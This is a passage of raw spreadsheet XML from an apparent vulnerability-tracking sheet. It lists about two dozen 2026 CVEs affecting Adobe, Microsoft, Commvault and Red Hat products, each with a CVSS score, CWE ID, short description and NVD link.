t="inlineStr"><is><t>CVE-2026-76191</t></is></c><c r="D316" s="5" t="n"><v>8.199999999999999</v></c><c r="E316" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F316" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G316" s="5" t="inlineStr" /><c r="H316" s="5" t="n"><v>0.003</v></c><c r="I316" s="5" t="inlineStr" /><c r="J316" s="5" t="inlineStr" /><c r="K316" s="5" t="inlineStr"><is><t>adobe:animate, apple:macos, microsoft:windows</t></is></c><c r="L316" s="5" t="inlineStr" /><c r="M316" s="5" t="inlineStr" /><c r="N316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P316" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q316" s="5" t="inlineStr" /><c r="R316" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S316" s="5" t="inlineStr"><is><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is></c><c r="T316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t></is></c></row><row r="317"><c r="A317" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C317" s="5" t="inlineStr"><is><t>CVE-2026-76202</t></is></c><c r="D317" s="5" t="n"><v>8.199999999999999</v></c><c r="E317" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F317" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G317" s="5" t="inlineStr" /><c r="H317" s="5" t="n"><v>0.004</v></c><c r="I317" s="5" t="inlineStr" /><c r="J317" s="5" t="inlineStr" /><c r="K317" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L317" s="5" t="inlineStr" /><c r="M317" s="5" t="inlineStr" /><c r="N317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P317" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q317" s="5" t="inlineStr" /><c r="R317" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S317"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T317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t></is></c></row><row r="318"><c r="A318" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C318" s="5" t="inlineStr"><is><t>CVE-2026-77097</t></is></c><c r="D318" s="5" t="n"><v>8.199999999999999</v></c><c r="E318" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G318" s="5" t="inlineStr" /><c r="H318" s="5" t="n"><v>0.003</v></c><c r="I318" s="5" t="inlineStr" /><c r="J318" s="5" t="inlineStr" /><c r="K318" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L318" s="5" t="inlineStr" /><c r="M318" s="5" t="inlineStr" /><c r="N318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P318" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q318" s="5" t="inlineStr" /><c r="R318" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S318" s="5" t="inlineStr"><is><t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="T318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t></is></c></row><row r="319"><c r="A319" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C319" s="5" t="inlineStr"><is><t>CVE-2026-77968</t></is></c><c r="D319" s="5" t="n"><v>8.199999999999999</v></c><c r="E319" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F319" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G319" s="5" t="inlineStr" /><c r="H319" s="5" t="n"><v>0.002</v></c><c r="I319" s="5" t="inlineStr" /><c r="J319" s="5" t="inlineStr" /><c r="K319" s="5" t="inlineStr" /><c r="L319" s="5" t="inlineStr" /><c r="M319" s="5" t="inlineStr" /><c r="N319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q319" s="5" t="inlineStr" /><c r="R319" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S319" s="5" t="inlineStr"><is><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is></c><c r="T319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t></is></c></row><row r="320"><c r="A320" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C320" s="5" t="inlineStr"><is><t>CVE-2026-81354</t></is></c><c r="D320" s="5" t="n"><v>8.199999999999999</v></c><c r="E320" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F320" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G320" s="5" t="inlineStr" /><c r="H320" s="5" t="n"><v>0.002</v></c><c r="I320" s="5" t="inlineStr" /><c r="J320" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K320" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t></is></c><c r="L320" s="5" t="inlineStr" /><c r="M320" s="5" t="inlineStr" /><c r="N320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P320" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q320" s="5" t="inlineStr" /><c r="R320" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S320" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T320" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t></is></c></row><row r="321"><c r="A321" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C321" s="5" t="inlineStr"><is><t>CVE-2026-81356</t></is></c><c r="D321" s="5" t="n"><v>8.199999999999999</v></c><c r="E321" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F321" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G321" s="5" t="inlineStr" /><c r="H321" s="5" t="n"><v>0.003</v></c><c r="I321" s="5" t="inlineStr" /><c r="J321" s="5" t="inlineStr" /><c r="K321" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L321" s="5" t="inlineStr" /><c r="M321" s="5" t="inlineStr" /><c r="N321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P321" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q321" s="5" t="inlineStr" /><c r="R321" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="S321" s="5" t="inlineStr"><is><t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t></is></c></row><row r="322"><c r="A322" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C322" s="5" t="inlineStr"><is><t>CVE-2026-81357</t></is></c><c r="D322" s="5" t="n"><v>8.199999999999999</v></c><c r="E322" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F322" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G322" s="5" t="inlineStr" /><c r="H322" s="5" t="n"><v>0.003</v></c><c r="I322" s="5" t="inlineStr" /><c r="J322" s="5" t="inlineStr" /><c r="K322" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L322" s="5" t="inlineStr" /><c r="M322" s="5" t="inlineStr" /><c r="N322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P322" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q322" s="5" t="inlineStr" /><c r="R322" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S322" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t></is></c></row><row r="323"><c r="A323" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C323" s="5" t="inlineStr"><is><t>CVE-2026-81378</t></is></c><c r="D323" s="5" t="n"><v>8.199999999999999</v></c><c r="E323" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F323" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G323" s="5" t="inlineStr" /><c r="H323" s="5" t="n"><v>0.003</v></c><c r="I323" s="5" t="inlineStr" /><c r="J323" s="5" t="inlineStr" /><c r="K323" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L323" s="5" t="inlineStr" /><c r="M323" s="5" t="inlineStr" /><c r="N323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P323" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q323" s="5" t="inlineStr" /><c r="R323" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="S323" s="5" t="inlineStr"><is><t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t></is></c></row><row r="324"><c r="A324" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C324" s="5" t="inlineStr"><is><t>CVE-2026-81379</t></is></c><c r="D324" s="5" t="n"><v>8.199999999999999</v></c><c r="E324" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F324" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G324" s="5" t="inlineStr" /><c r="H324" s="5" t="n"><v>0.003</v></c><c r="I324" s="5" t="inlineStr" /><c r="J324" s="5" t="inlineStr" /><c r="K324" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L324" s="5" t="inlineStr" /><c r="M324" s="5" t="inlineStr" /><c r="N324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P324" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q324" s="5" t="inlineStr" /><c r="R324" s="5" t="inlineStr"><is><t>CWE-636</t></is></c><c r="S324" s="5" t="inlineStr"><is><t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t></is></c></row><row r="325"><c r="A325" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C325" s="5" t="inlineStr"><is><t>CVE-2026-83939</t></is></c><c r="D325" s="5" t="n"><v>8.199999999999999</v></c><c r="E325" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F325" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G325" s="5" t="inlineStr" /><c r="H325" s="5" t="n"><v>0.003</v></c><c r="I325" s="5" t="inlineStr" /><c r="J325" s="5" t="inlineStr" /><c r="K325" s="5" t="inlineStr"><is><t>microsoft:windows_11_26h1</t></is></c><c r="L325" s="5" t="inlineStr" /><c r="M325" s="5" t="inlineStr" /><c r="N325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P325" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q325" s="5" t="inlineStr" /><c r="R325" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S325" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t></is></c></row><row r="326"><c r="A326" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C326" s="5" t="inlineStr"><is><t>CVE-2026-86600</t></is></c><c r="D326" s="5" t="n"><v>8.199999999999999</v></c><c r="E326" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F326" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G326" s="5" t="inlineStr" /><c r="H326" s="5" t="n"><v>0.003</v></c><c r="I326" s="5" t="inlineStr" /><c r="J326" s="5" t="inlineStr" /><c r="K326" s="5" t="inlineStr" /><c r="L326" s="5" t="inlineStr" /><c r="M326" s="5" t="inlineStr" /><c r="N326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P326" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q326" s="5" t="inlineStr" /><c r="R326" s="5" t="inlineStr"><is><t>CWE-441, CWE-522</t></is></c><c r="S326" s="5" t="inlineStr"><is><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is></c><c r="T326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t></is></c></row><row r="327"><c r="A327" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C327" s="5" t="inlineStr"><is><t>CVE-2026-47297</t></is></c><c r="D327" s="5" t="n"><v>8.1</v></c><c r="E327" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F327" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G327" s="5" t="inlineStr" /><c r="H327" s="5" t="n"><v>0.008</v></c><c r="I327" s="5" t="inlineStr" /><c r="J327" s="5" t="inlineStr" /><c r="K327" s="5" t="inlineStr" /><c r="L327" s="5" t="inlineStr" /><c r="M327" s="5" t="inlineStr" /><c r="N327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P327" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q327" s="5" t="inlineStr" /><c r="R327" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S327" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t></is></c></row><row r="328"><c r="A328" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C328" s="5" t="inlineStr"><is><t>CVE-2026-55007</t></is></c><c r="D328" s="5" t="n"><v>8.1</v></c><c r="E328" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G328" s="5" t="inlineStr" /><c r="H328" s="5" t="n"><v>0.007</v></c><c r="I328" s="5" t="inlineStr" /><c r="J328" s="5" t="inlineStr" /><c r="K328" s="5" t="inlineStr" /><c r="L328" s="5" t="inlineStr" /><c r="M328" s="5" t="inlineStr" /><c r="N328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P328" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q328" s="5" t="inlineStr" /><c r="R328" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S328" s="5" t="inlineStr"><is><t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t></is></c></row><row r="329"><c r="A329" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B329" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C329" s="5" t="inlineStr"><is><t>CVE-2026-69325</t></is></c><c r="D329" s="5" t="n"><v>8.1</v></c><c r="E329" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F329" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G329" s="5" t="inlineStr" /><c r="H329" s="5" t="n"><v>0.006</v></c><c r="I329" s="5" t="inlineStr" /><c r="J329" s="5" t="inlineStr" /><c r="K329" s="5" t="inlineStr" /><c r="L329" s="5" t="inlineStr" /><c r="M329" s="5" t="inlineStr" /><c r="N329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q329" s="5" t="inlineStr" /><c r="R329" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S329" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t></is></c></row><row r="330"><c r="A330" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C330" s="5" t="inlineStr"><is><t>CVE-2026-69380</t></is></c><c r="D330" s="5" t="n"><v>8.1</v></c><c r="E330" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F330" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G330" s="5" t="inlineStr" /><c r="H330" s="5" t="n"><v>0.007</v></c><c r="I330" s="5" t="inlineStr" /><c r="J330" s="5" t="inlineStr" /><c r="K330" s="5" t="inlineStr" /><c r="L330" s="5" t="inlineStr" /><c r="M330" s="5" t="inlineStr" /><c r="N330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P330" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q330" s="5" t="inlineStr" /><c r="R330" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S330" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t></is></c></row><row r="331"><c r="A331" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C331" s="5" t="inlineStr"><is><t>CVE-2026-69438</t></is></c><c r="D331" s="5" t="n"><v>8.1</v></c><c r="E331" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F331" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G331" s="5" t="inlineStr" /><c r="H331" s="5" t="n"><v>0.007</v></c><c r="I331" s="5" t="inlineStr" /><c r="J331" s="5" t="inlineStr" /><c r="K331" s="5" t="inlineStr" /><c r="L331" s="5" t="inlineStr" /><c r="M331" s="5" t="inlineStr" /><c r="N331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P331" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q331" s="5" t="inlineStr" /><c r="R331" s="5" t="inlineStr"><is><t>CWE-681</t></is></c><c r="S331" s="5" t="inlineStr"><is><t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t></is></c></row><row r="332"><c r="A332" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B332" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C332" s="5" t="inlineStr"><is><t>CVE-2026-69510</t></is></c><c r="D332" s="5" t="n"><v>8.1</v></c><c r="E332" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F332" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G332" s="5" t="inlineStr" /><c r="H332" s="5" t="n"><v>0.007</v></c><c r="I332" s="5" t="inlineStr" /><c r="J332" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K332" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L332" s="5" t="inlineStr" /><c r="M332" s="5" t="inlineStr" /><c r="N332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P332" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q332" s="5" t="inlineStr" /><c r="R332" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S332" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69510</t></is></c></row><row r="333"><c r="A333" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C333" s="5" t="inlineStr"><is><t>CVE-2026-69524</t></is></c><c r="D333" s="5" t="n"><v>8.1</v></c><c r="E333" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F333" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G333" s="5" t="inlineStr" /><c r="H333" s="5" t="n"><v>0.007</v></c><c r="I333" s="5" t="inlineStr" /><c r="J333" s="5" t="inlineStr" /><c r="K333" s="5" t="inlineStr" /><c r="L333" s="5" t="inlineStr" /><c r="M333" s="5" t="inlineStr" /><c r="N333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P333" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q333" s="5" t="inlineStr" /><c r="R333" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S333" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t></is></c></row><row r="334"><c r="A334" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C334" s="5" t="inlineStr"><is><t>CVE-2026-69530</t></is></c><c r="D334" s="5" t="n"><v>8.1</v></c><c r="E334" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F334" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G334" s="5" t="inlineStr" /><c r="H334" s="5" t="n"><v>0.006</v></c><c r="I334" s="5" t="inlineStr" /><c r="J334" s="5" t="inlineStr" /><c r="K334" s="5" t="inlineStr" /><c r="L334" s="5" t="inlineStr" /><c r="M334" s="5" t="inlineStr" /><c r="N334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P334" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q334" s="5" t="inlineStr" /><c r="R334" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S334" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t></is></c></row><row r="335"><c r="A335" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C335" s="5" t="inlineStr"><is><t>CVE-2026-69546</t></is></c><c r="D335" s="5" t="n"><v>8.1</v></c><c r="E335" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F335" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G335" s="5" t="inlineStr" /><c r="H335" s="5" t="n"><v>0.007</v></c><c r="I335" s="5" t="inlineStr" /><c r="J335" s="5" t="inlineStr" /><c r="K335" s="5" t="inlineStr" /><c r="L335" s="5" t="inlineStr" /><c r="M335" s="5" t="inlineStr" /><c r="N335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P335" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q335" s="5" t="inlineStr" /><c r="R335" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S335" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t></is></c></row><row r="336"><c r="A336" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C336" s="5" t="inlineStr"><is><t>CVE-2026-69620</t></is></c><c r="D336" s="5" t="n"><v>8.1</v></c><c r="E336" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F336" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G336" s="5" t="inlineStr" /><c r="H336" s="5" t="n"><v>0.007</v></c><c r="I336" s="5" t="inlineStr" /><c r="J336" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K336" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L336" s="5" t="inlineStr" /><c r="M336" s="5" t="inlineStr" /><c r="N336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P336" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q336" s="5" t="inlineStr" /><c r="R336" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S336" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t></is></c></row><row r="337"><c r="A337" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C337" s="5" t="inlineStr"><is><t>CVE-2026-69680</t></is></c><c r="D337" s="5" t="n"><v>8.1</v></c><c r="E337" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F337" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G337" s="5" t="inlineStr" /><c r="H337" s="5" t="n"><v>0.003</v></c><c r="I337" s="5" t="inlineStr" /><c r="J337" s="5" t="inlineStr" /><c r="K337" s="5" t="inlineStr" /><c r="L337" s="5" t="inlineStr" /><c r="M337" s="5" t="inlineStr" /><c r="N337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P337" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q337" s="5" t="inlineStr" /><c r="R337" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S337" s="5" t="inlineStr"><is><t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t></is></c></row><row r="338"><c r="A338" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C338" s="5" t="inlineStr"><is><t>CVE-2026-69732</t></is></c><c r="D338" s="5" t="n"><v>8.1</v></c><c r="E338" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F338" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G338" s="5" t="inlineStr" /><c r="H338" s="5" t="n"><v>0.007</v></c><c r="I338" s="5" t="inlineStr" /><c r="J338" s="5" t="inlineStr" /><c r="K338" s="5" t="inlineStr" /><c r="L338" s="5" t="inlineStr" /><c r="M338" s="5" t="inlineStr" /><c r="N338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c 